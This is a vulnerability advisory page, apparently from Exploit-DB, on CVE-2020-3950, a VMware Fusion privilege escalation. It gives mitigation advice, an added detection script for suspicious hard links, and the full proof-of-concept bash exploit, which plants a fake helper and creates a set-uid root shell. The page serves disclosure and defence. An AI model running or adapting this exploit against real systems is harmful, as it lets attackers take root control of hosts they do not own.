Vendor: Fusion
By: Rich Mirch
CVSS: 7.8 (HIGH)
Type: Privilege Escalation
CWE: 269
Product Name: Fusion
Affected Version From: VMware Fusion Professional 11.5.1 (15018442)
Affected Version To: VMware Fusion Professional 11.5.2 (15794494)
Patch Exists: YES
Related CVE: CVE-2020-3950
CPE: a:vmware:fusion
Other Scripts: N/A
Platforms Tested: macOS 10.14.6
Year: 2020

VMware Fusion 11.5.2 – Privilege Escalation

A privilege escalation vulnerability exists in VMware Fusion 11.5.1 and 11.5.2 that allows an attacker to gain root privileges on the host system. The vulnerability is due to insecure handling in the Open VMware USB Arbitrator Service helper. In the PoC below, the attacker creates a malicious file named "VMware USB Arbitrator Service" in the ~/Contents/Library/services directory and hard-links the Open VMware USB Arbitrator Service binary from the Fusion application bundle into the ~/a/b/c directory. When the linked copy of Open VMware USB Arbitrator Service is started, the malicious file is executed, which gives the attacker root privileges on the host system.

Mitigation:

Users should upgrade to VMware Fusion 11.5.3 or later to address this vulnerability.
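
Until a host is upgraded, the condition the PoC depends on can be checked for directly. The script below is an added example, not part of the original advisory or of any VMware tooling: it lists extra hard links to the Fusion helper named in the PoC, plus set-uid files that have more than one name, under the directories passed to it. The function names and the choice of directories to scan are assumptions.

```shell
#!/bin/bash
# Added defensive example (not from the original page).
# HELPER is the path the PoC hard-links; adjust if Fusion is installed elsewhere.
HELPER="/Applications/VMware Fusion.app/Contents/Library/services/Open VMware USB Arbitrator Service"

# Print every file under the given roots that shares device and inode with
# $1 (i.e. is a hard link to it), excluding the original path itself.
extra_hardlinks() {
    local target=$1; shift
    [ -e "$target" ] || return 0          # helper absent: nothing to report
    find "$@" -type f -samefile "$target" ! -path "$target" 2>/dev/null
}

# Print set-uid regular files under the given roots that have more than one
# name. A set-uid binary reachable through a user-chosen path is the
# precondition for this class of bug.
multilinked_setuid() {
    find "$@" -type f -perm -4000 -links +1 2>/dev/null
}

# Run both checks. Returns 0 when nothing is found, 1 when findings are
# printed (one per line, prefixed with SUSPICIOUS).
audit() {
    local target=$1; shift
    local hits
    hits=$( { extra_hardlinks "$target" "$@"; multilinked_setuid "$@"; } | sort -u )
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits" | sed 's/^/SUSPICIOUS: /'
    return 1
}

# Stand-alone use: pass the directories to scan, e.g.  ./audit.sh /Users
if [ "$#" -gt 0 ]; then
    audit "$HELPER" "$@"
fi
```

Hard links only exist within one volume, so scan the user-writable directories that share a volume with the application bundle.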

Exploit-DB raw data:

# Exploit Title: VMware Fusion 11.5.2 - Privilege Escalation
# Date: 2020-03-17
# Exploit Author: Rich Mirch
# Vendor Homepage: https://www.vmware.com/products/fusion.html
# Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2020-0005.html
# Software Link: https://download3.vmware.com/software/fusion/file/VMware-Fusion-11.5.1-15018442.dmg
# Versions:
# VMware Fusion Professional 11.5.1 (15018442)
# VMware Fusion Professional 11.5.2 (15794494)
#
# Tested on: macOS 10.14.6
# CVE : CVE-2020-3950
# Source PoC: https://raw.githubusercontent.com/mirchr/security-research/master/vulnerabilities/CVE-2020-3950.sh
#
#
#!/bin/bash
echo "CVE-2020-3950 VMware Fusion EoP PoC by @0xm1rch"

mkdir -p ~/a/b/c
mkdir -p ~/Contents/Library/services

cat > ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service <<EOF
#!/usr/bin/python
import os
os.setuid(0)
os.system("cp /bin/bash $HOME/.woot;chmod 4755 $HOME/.woot");
EOF

chmod 755 ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service

cd ~/a/b/c
ln "/Applications/VMware Fusion.app/Contents/Library/services/Open VMware USB Arbitrator Service" . 2>/dev/null
"${PWD}/Open VMware USB Arbitrator Service" >/dev/null 2>/dev/null &
p=$!
echo "Sleeping for 5 seconds"
sleep 5
kill ${p?}
wait

echo "Sleeping for 7 seconds"
sleep 7

$HOME/.woot -p